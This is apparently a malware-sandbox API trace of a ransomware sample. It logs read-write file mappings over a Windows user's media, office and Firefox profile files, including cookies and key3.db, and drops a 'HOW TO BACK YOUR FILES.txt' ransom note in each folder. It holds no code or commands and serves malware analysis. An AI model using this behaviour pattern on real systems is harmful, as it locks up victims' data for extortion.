Create Mapping C:\Users\FD1HVy\AppData\Roaming\O3kltfMNYirubdno.jpg filename = C:\Users\FD1HVy\AppData\Roaming\O3kltfMNYirubdno.jpg, protection = PAGE_READWRITE, maximum_size = 57424 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\OUtMYFGKvN.pptx filename = C:\Users\FD1HVy\AppData\Roaming\OUtMYFGKvN.pptx, protection = PAGE_READWRITE, maximum_size = 71248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\PUFiGN K2uY.jpg filename = C:\Users\FD1HVy\AppData\Roaming\PUFiGN K2uY.jpg, protection = PAGE_READWRITE, maximum_size = 98048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\p_O1lv1CEgWauiU.mp3 filename = C:\Users\FD1HVy\AppData\Roaming\p_O1lv1CEgWauiU.mp3, protection = PAGE_READWRITE, maximum_size = 28064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\q-MlqL 1rLwdq98.png filename = C:\Users\FD1HVy\AppData\Roaming\q-MlqL 1rLwdq98.png, protection = PAGE_READWRITE, maximum_size = 48288 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Qu9-HWI6tzX5Zu16Cpf.wav filename = C:\Users\FD1HVy\AppData\Roaming\Qu9-HWI6tzX5Zu16Cpf.wav, protection = PAGE_READWRITE, maximum_size = 36880 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Rx-7.wav filename = C:\Users\FD1HVy\AppData\Roaming\Rx-7.wav, protection = PAGE_READWRITE, maximum_size = 81760 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\SBQ20pb9Qa7gV5.png filename = C:\Users\FD1HVy\AppData\Roaming\SBQ20pb9Qa7gV5.png, protection = PAGE_READWRITE, maximum_size = 79104 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\tkUYMv-IQ SY5z7wi.wav filename = C:\Users\FD1HVy\AppData\Roaming\tkUYMv-IQ SY5z7wi.wav, protection = PAGE_READWRITE, maximum_size = 35296 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\TuYd5M_4-oyQb.ods filename = C:\Users\FD1HVy\AppData\Roaming\TuYd5M_4-oyQb.ods, protection = PAGE_READWRITE, maximum_size = 49344 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\V4Td8ZSwiEkT0.bmp filename = C:\Users\FD1HVy\AppData\Roaming\V4Td8ZSwiEkT0.bmp, protection = PAGE_READWRITE, maximum_size = 43856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\XkvuMMsv206RYIIfQX.flv filename = C:\Users\FD1HVy\AppData\Roaming\XkvuMMsv206RYIIfQX.flv, protection = PAGE_READWRITE, maximum_size = 66208 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\y4rKx2VEQaUc.bmp filename = C:\Users\FD1HVy\AppData\Roaming\y4rKx2VEQaUc.bmp, protection = PAGE_READWRITE, maximum_size = 92640 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\yAdKv7OjIt.gif filename = C:\Users\FD1HVy\AppData\Roaming\yAdKv7OjIt.gif, protection = PAGE_READWRITE, maximum_size = 58864 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\_lYb0S3w_SO.xls filename = C:\Users\FD1HVy\AppData\Roaming\_lYb0S3w_SO.xls, protection = PAGE_READWRITE, maximum_size = 19264 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Sun\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Sun\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Sun\Java\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Sun\Java\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Skype\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Skype\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf filename = C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf, protection = PAGE_READWRITE, maximum_size = 848 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4, protection = PAGE_READWRITE, maximum_size = 1440 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml, protection = PAGE_READWRITE, maximum_size = 280944 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db, protection = PAGE_READWRITE, maximum_size = 66304 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json, protection = PAGE_READWRITE, maximum_size = 1584 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite, protection = PAGE_READWRITE, maximum_size = 230144 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite, protection = PAGE_READWRITE, maximum_size = 525056 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json, protection = PAGE_READWRITE, maximum_size = 11312 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite, protection = PAGE_READWRITE, maximum_size = 5243648 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm, protection = PAGE_READWRITE, maximum_size = 33536 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal, protection = PAGE_READWRITE, maximum_size = 591056 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json, protection = PAGE_READWRITE, maximum_size = 1456 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db, protection = PAGE_READWRITE, maximum_size = 17152 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite, protection = PAGE_READWRITE, maximum_size = 99072 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite, protection = PAGE_READWRITE, maximum_size = 5243648 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm, protection = PAGE_READWRITE, maximum_size = 33536 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal, protection = PAGE_READWRITE, maximum_size = 2132288 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat, protection = PAGE_READWRITE, maximum_size = 1232 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js, protection = PAGE_READWRITE, maximum_size = 8912 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4, protection = PAGE_READWRITE, maximum_size = 14832 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db, protection = PAGE_READWRITE, maximum_size = 17152 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json, protection = PAGE_READWRITE, maximum_size = 1056 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js, protection = PAGE_READWRITE, maximum_size = 5952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt, protection = PAGE_READWRITE, maximum_size = 2592 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite, protection = PAGE_READWRITE, maximum_size = 1280 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite, protection = PAGE_READWRITE, maximum_size = 99072 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json, protection = PAGE_READWRITE, maximum_size = 1120 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata, protection = PAGE_READWRITE, maximum_size = 816 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2, protection = PAGE_READWRITE, maximum_size = 832 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READWRITE, maximum_size = 123648 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2, protection = PAGE_READWRITE, maximum_size = 816 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, protection = PAGE_READWRITE, maximum_size = 49920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.files\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js, protection = PAGE_READWRITE, maximum_size = 8768 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622, protection = PAGE_READWRITE, maximum_size = 14816 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\saved-telemetry-pings\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\saved-telemetry-pings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\minidumps\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\minidumps\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info, protection = PAGE_READWRITE, maximum_size = 896 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\WINNT_x86_64-msvc\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\WINNT_x86_64-msvc\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json, protection = PAGE_READWRITE, maximum_size = 944 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json, protection = PAGE_READWRITE, maximum_size = 832 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4, protection = PAGE_READWRITE, maximum_size = 3808 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4, protection = PAGE_READWRITE, maximum_size = 7264 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\BiosBlocks.xml filename = C:\Windows10Upgrade\resources\i386\BiosBlocks.xml, protection = PAGE_READWRITE, maximum_size = 92416 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4, protection = PAGE_READWRITE, maximum_size = 6720 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4, protection = PAGE_READWRITE, maximum_size = 7312 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4, protection = PAGE_READWRITE, maximum_size = 7536 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4, protection = PAGE_READWRITE, maximum_size = 848 True 1
Fn
